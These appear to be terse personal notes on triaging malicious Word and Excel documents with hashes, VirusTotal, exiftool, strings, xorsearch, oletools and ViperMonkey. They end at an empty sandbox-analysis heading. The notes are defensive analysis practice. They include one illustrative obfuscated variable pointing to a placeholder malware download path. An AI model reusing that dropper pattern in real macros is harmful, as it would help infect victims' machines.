# Introduction # Static Analysis 1. Unzip malware 2. `md5sum <docname> 3. `sha256sum <docname> 4. input one of the above hashes into virustotal 1. rescan if cache is too long ago 2. check logged names in details 3. relations 1. contacted IP addresses 2. bundled files 3. dropped files 4. behavior 1. dns resolutions 2. ip traffic 3. registry keys set 4. spawned processes 5. `exiftool <docname> 1. filename 2. modification date/time 3. permissions 4. filetype/extension 5. language code (different language?) 6. template 1. dotm = macro 7. heading pairs (different language?) 6. `strings -n 5 <docname> 1. IP Addresses 2. websites 3. domains 4. file locations 1. temp directory 5. malicious files 6. malicious code 1. x64 2. visualbasic (VB) 1. this means macros are included 2. AutoOpen 7. `xorsearch <docname> <type> 1. type = http, url, etc 8. `xorsearch -p <docname> 1. searches for executables # Details `strings <docname> | grep https http vbs `olemeta <docname> https://github.com/decalage2/oletools/wiki/olemeta Olemeta is for parsing MS Office documents like Word and Excel `oleid <docname> file format container format application name properties code page encrypted **vba macros** xlm macros external relationships https://github.com/decalage2/oletools/wiki/oleid `olevba <docname> scrubs macros for suspicious keywords # Details 2 `olevba (docname.doc) > (docname.vba) - open with visual studio code (or another IDE that can parse vba) `olevba --debof --reveal (docname.vba) > (docname_deobf.vba) - deobfuscates and otherwise makes readable the visual basic code if you find nonsensical strings, find all other instances in the document to see if they are set to = anything. These are typically variables - example: qa49ouihwjkg = maliciousip/directory/malware.exe https://github.com/decalage2/ViperMonkey `vmonkey (baddoc.vba) - before running this, remove anything that is not visualbasic code within the document - parses visualbasic with descriptions `vmonkey --iocs (baddoc.vba) # Sandbox Analysis